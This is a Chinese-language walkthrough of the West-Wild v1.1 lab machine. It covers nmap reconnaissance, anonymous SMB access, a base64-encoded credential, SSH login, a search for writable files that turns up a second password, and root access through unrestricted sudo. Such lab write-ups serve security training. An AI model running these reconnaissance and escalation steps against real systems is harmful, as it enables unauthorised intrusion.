West-Wild-v1.1--靶机实操讲解

信息收集

主机发现

先看主机和靶机的ip。

ip a

sudu nmap -sn 192.168.1.0/24

端口扫描

sudu nmap -sT --min-rate 10000 -p- 192.168.1.135

对端口进行详细信息扫描。

sudo nmap -sT -sV -sC -O -p22,80,139,445 192.168.1.135
-sV 扫描服务版本
-sC 用默认的脚本进行扫描
-O 探测操作系统的版本

┌──(kali💋kali)-[~]
└─$ sudo nmap -sT -sV -sC -O -p22,80,139,445 192.168.1.135
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 15:34 CST
Nmap scan report for 192.168.1.135
Host is up (0.00058s latency).

PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 6fee95919c62b214cd630a3ef8109eda (DSA)
|   2048 104594fea72f028a9b211a31c5033048 (RSA)
|   256 9794178618e28e7a738e412076ba5173 (ECDSA)
|_  256 2381c776bb3778ee3b73e255ad813272 (ED25519)
80/tcp  open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 00:0C:29:CC:AC:22 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: WESTWILD; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 7h00m02s, deviation: 1h43m55s, median: 8h00m02s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: WESTWILD, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time: 
|   date: 2024-08-02T15:35:25
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: westwild
|   NetBIOS computer name: WESTWILD\x00
|   Domain name: \x00
|   FQDN: westwild
|_  System time: 2024-08-02T18:35:25+03:00

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.62 seconds

22是open SSH 服务，6.6.1版本，这个端口有漏洞的概率极小，优先级排后。80端口开放web服务，139和445端口都是samba服务。

进行UDP的扫描。

sudo nmap -sU --top-ports 20 192.168.1.135
--top-ports 20 对前20个端口进行扫描

┌──(kali💋kali)-[~]
└─$ sudo nmap -sU --top-ports 20 192.168.1.135                                                          255 ⨯
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 15:38 CST
Nmap scan report for 192.168.1.135
Host is up (0.00066s latency).

PORT      STATE         SERVICE
53/udp    closed        domain
67/udp    closed        dhcps
68/udp    open|filtered dhcpc
69/udp    closed        tftp
123/udp   closed        ntp
135/udp   closed        msrpc
137/udp   open          netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   closed        netbios-ssn
161/udp   closed        snmp
162/udp   closed        snmptrap
445/udp   closed        microsoft-ds
500/udp   closed        isakmp
514/udp   closed        syslog
520/udp   closed        route
631/udp   closed        ipp
1434/udp  closed        ms-sql-m
1900/udp  closed        upnp
4500/udp  closed        nat-t-ike
49152/udp closed        unknown
MAC Address: 00:0C:29:CC:AC:22 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 35.42 seconds

tcp 扫出的四个端口，在tcp协议下都可以进行渗透测试，如果涉及到一些异常情况，或者需要找一些新的信息的时候，也可能涉及到udp。

利用nmap自带的漏洞脚本进行扫描。

sudo nmap --script=vuln -p22,80,139,445 192.168.1.135

┌──(kali💋kali)-[~]
└─$ sudo nmap --script=vuln -p22,80,139,445 192.168.1.135
Starting Nmap 7.93 ( https://nmap.org ) at 2024-08-02 15:46 CST
Nmap scan report for 192.168.1.135
Host is up (0.00052s latency).

PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
| http-slowloris-check: 
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|       
|     Disclosure date: 2009-09-17
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_      http://ha.ckers.org/slowloris/
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:CC:AC:22 (VMware)

Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-ms10-054: false
| smb-vuln-regsvc-dos: 
|   VULNERABLE:
|   Service regsvc in Microsoft Windows systems vulnerable to denial of service
|     State: VULNERABLE
|       The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
|       pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
|       while working on smb-enum-sessions.
|_          

Nmap done: 1 IP address (1 host up) scanned in 334.71 seconds

samba 测试

web渗透先放一旁，这里有两个端口开放smb服务，攻击面可能比较大。

sudo smbmap -H 192.168.1.135

显示3个smb的共享信息，但是只有wave可以访问，我们尝试进行连接。不需要密码，直接回车。

sudo smbclient //192.168.1.135/wave

这里有两个文件，我们把它们下载下来。打开看看。

┌──(kali💋kali)-[~/Desktop]
└─$ cat FLAG1.txt         
RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K

┌──(kali💋kali)-[~/Desktop]
└─$ cat message_from_aveng.txt 
Dear Wave ,
Am Sorry but i was lost my password ,
and i believe that you can reset  it for me . 
Thank You 
Aveng 

一个是base64编码，一个是讲述Aveng丢失了密码想让wave重置的这么一个信息。

我们把base64编码解密，如果解密不成功，说明它有可能是明文。

┌──(kali💋kali)-[~/Desktop]
└─$ echo RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K |base64 -d

Flag1{Welcome_T0_THE-W3ST-W1LD-B0rder}
user:wavex
password:door+open

给了一个用户名和密码。

这样smb服务的两个端口就利用完毕了，我们还有22和80端口，22端口的ssh服务排后，先看80端口的web服务，

web 渗透

访问网页。

没有什么特别的信息，右键查看源代码。

<!DOCTYPE html>
<html>
<head>
<style>
body  {
 
  background-image: url("bkgro.png");
  background-color: #ffb500;
      background-repeat: no-repeat;
  background-attachment: fixed;
  background-position: center; 
}
</style>
</head>
<body>
</body>
</html>

没有什么信息。查看图片是否有隐写。

┌──(kali💋kali)-[~/Desktop]
└─$ exiftool bkgro.png                                                                                  127 ⨯
ExifTool Version Number         : 12.92
File Name                       : bkgro.png
Directory                       : .
File Size                       : 13 kB
File Modification Date/Time     : 2019:07:30 11:03:42+08:00
File Access Date/Time           : 2024:08:02 16:19:52+08:00
File Inode Change Date/Time     : 2024:08:02 16:19:51+08:00
File Permissions                : -rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 1280
Image Height                    : 720
Bit Depth                       : 8
Color Type                      : Palette
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
SRGB Rendering                  : Relative Colorimetric
Pixels Per Unit X               : 2835
Pixels Per Unit Y               : 2835
Pixel Units                     : meters
Palette                         : (Binary data 285 bytes, use -b option to extract)
Image Size                      : 1280x720
Megapixels                      : 0.922

没有什么有用的信息。我们先把拿到的信息进行ssh服务连接。

利用samba敏感信息获取立足点

还记得我们得到的信息嘛？

user:wavex
password:door+open

┌──(kali💋kali)-[~]
└─$ sudo ssh wavex@192.168.1.135                                                                                                             130 ⨯
wavex@192.168.1.135's password: 
Welcome to Ubuntu 14.04.6 LTS (GNU/Linux 4.4.0-142-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Fri Aug  2 19:46:01 +03 2024

  System load:  0.0               Processes:           164
  Usage of /:   78.0% of 1.70GB   Users logged in:     0
  Memory usage: 10%               IP address for eth0: 192.168.1.135
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

Your Hardware Enablement Stack (HWE) is supported until April 2019.
Last login: Fri Aug  2 19:46:01 2024 from 192.168.1.128
wavex@WestWild:~$ 

成功获取。先来三件套。

wavex@WestWild:~$ whoami
wavex

wavex@WestWild:~$ uname -a
Linux WestWild 4.4.0-142-generic #168~14.04.1-Ubuntu SMP Sat Jan 19 11:28:33 UTC 2019 i686 i686 i686 GNU/Linux

wavex@WestWild:~$ sudo -l
[sudo] password for wavex: 
Sorry, user wavex may not run sudo on WestWild.
wavex@WestWild:~$ 

我们可以查看home文件。在home文件下有俩个目录。

wavex@WestWild:~$ cd /home
wavex@WestWild:/home$ ls
aveng  wavex

wavex@WestWild:/home$ cd wavex
wavex@WestWild:~$ ls-liah
ls-liah: command not found
wavex@WestWild:~$ ls -liah
total 36K
69673 drwxr-xr-x 4 wavex  wavex   4.0K Aug  2 19:46 .
 7684 drwxr-xr-x 4 root   root    4.0K Jul 30  2019 ..
69900 -rw------- 1 wavex  wavex      5 Aug  2 19:46 .bash_history
69674 -rw-r--r-- 1 wavex  wavex    220 Jul 30  2019 .bash_logout
66935 -rw-r--r-- 1 wavex  wavex   3.6K Jul 30  2019 .bashrc
69882 drwx------ 2 wavex  wavex   4.0K Aug  2  2019 .cache
  611 -rw-r--r-- 1 wavex  wavex    675 Jul 30  2019 .profile
69690 -rw------- 1 wavex  wavex    870 Aug  2  2019 .viminfo
69679 drwxrwxrwx 2 nobody nogroup 4.0K Jul 30  2019 wave
wavex@WestWild:~$ 

我们看一下wavex这个用户的vm的编辑记录。

cat .viminfo

wavex@WestWild:~$ cat .viminfo
# This viminfo file was generated by Vim 7.4.
# You may edit it if you're careful!

# Value of 'encoding' when this file was written
*encoding=utf-8


# hlsearch on (H) or off (h):
~h
# Command Line History (newest to oldest):
:!bash
:x

# Search String History (newest to oldest):

# Expression History (newest to oldest):

# Input Line History (newest to oldest):

# Input Line History (newest to oldest):

# Registers:

# File marks:
'0  1  0  /etc/passwd
'1  2  0  ~/wave/flag1.txt
'2  2  0  ~/wave/flag1.txt

# Jumplist (newest first):
-'  1  0  /etc/passwd
-'  2  0  ~/wave/flag1.txt
-'  1  0  ~/wave/flag1.txt
-'  1  0  /etc/shadow
-'  2  0  ~/wave/flag1.txt
-'  1  0  ~/wave/flag1.txt
-'  2  0  ~/wave/flag1.txt
-'  1  0  ~/wave/flag1.txt

# History of marks within files (newest to oldest):

> /etc/passwd
        "       1       0

> ~/wave/flag1.txt
        "       2       0
        ^       2       0
        .       1       2
        +       1       2
wavex@WestWild:~$ 

发现有/etc/passwd，我们看一下对passwd的权限。

wavex@WestWild:~$ ls -liah /etc/passwd
69678 -rw-r--r-- 1 root root 1.3K Jul 30  2019 /etc/passwd

看来只有读的权限。

我们看一下有没有自动任务。

wavex@WestWild:~$ cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

看来是没有。我们寻找可写文件。

find / -writable -type f ! -path '/proc/*' 2>/dev/null
-writable 可写
 ! -path '/proc/*' 排除这个路径
 2>/dev/null 丢掉错误信息

wavex@WestWild:~$ find / -writable -type f ! -path '/proc/*' 2>/dev/null
/sys/fs/cgroup/systemd/user/1001.user/2.session/tasks
/sys/fs/cgroup/systemd/user/1001.user/2.session/cgroup.procs
/sys/kernel/security/apparmor/policy/.remove
/sys/kernel/security/apparmor/policy/.replace
/sys/kernel/security/apparmor/policy/.load
/sys/kernel/security/apparmor/.remove
/sys/kernel/security/apparmor/.replace
/sys/kernel/security/apparmor/.load
/sys/kernel/security/apparmor/.ns_name
/sys/kernel/security/apparmor/.ns_level
/sys/kernel/security/apparmor/.ns_stacked
/sys/kernel/security/apparmor/.stacked
/sys/kernel/security/apparmor/.access
/usr/share/av/westsidesecret/ififoregt.sh
/home/wavex/.cache/motd.legal-displayed
/home/wavex/wave/FLAG1.txt
/home/wavex/wave/message_from_aveng.txt
/home/wavex/.bash_history
/home/wavex/.profile
/home/wavex/.bashrc
/home/wavex/.viminfo
/home/wavex/.bash_logout
wavex@WestWild:~$ 

我们打开/usr/share/av/westsidesecret/ififoregt.sh文件

cat /usr/share/av/westsidesecret/ififoregt.sh

wavex@WestWild:~$ cat /usr/share/av/westsidesecret/ififoregt.sh
 #!/bin/bash 
 figlet "if i foregt so this my way"
 echo "user:aveng"
 echo "password:kaizen+80"

得到新的用户名密码。我们直接切换用户，进行用户间的横向移动。

su aveng

aveng@WestWild:/home/wavex$ whoami
aveng
aveng@WestWild:/home/wavex$ cd ../aveng
aveng@WestWild:~$ ls -liah
total 28K
69176 dr-xr-xr-x 3 aveng aveng 4.0K Aug  2  2019 .
 7684 drwxr-xr-x 4 root  root  4.0K Jul 30  2019 ..
13771 -rw-r--r-- 1 aveng aveng  220 Jul 30  2019 .bash_logout
13504 -rw-r--r-- 1 aveng aveng 3.6K Jul 30  2019 .bashrc
69632 drwx------ 2 aveng aveng 4.0K Jul 30  2019 .cache
  716 -rw-r--r-- 1 aveng aveng  675 Jul 30  2019 .profile
69667 -rw------- 1 aveng aveng  511 Jul 30  2019 .viminfo

sudo 提权到 root

利用 sudo -l 查看一下权限

aveng@WestWild:~$ sudo -l
[sudo] password for aveng: 
Matching Defaults entries for aveng on WestWild:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User aveng may run the following commands on WestWild:
    (ALL : ALL) ALL

直接是root权限了，那就非常简单了。

sudo /bin/bash

aveng@WestWild:~$ sudo /bin/bash
root@WestWild:~# whoami
root
root@WestWild:~# 

在root目录下还有一个flag2的文件。

root@WestWild:~# cd /root 
root@WestWild:/root# ls
FLAG2.txt
root@WestWild:/root# cat FLAG2.txt
Flag2{Weeeeeeeeeeeellco0o0om_T0_WestWild}

Great! take a screenshot and Share it with me in twitter @HashimAlshareff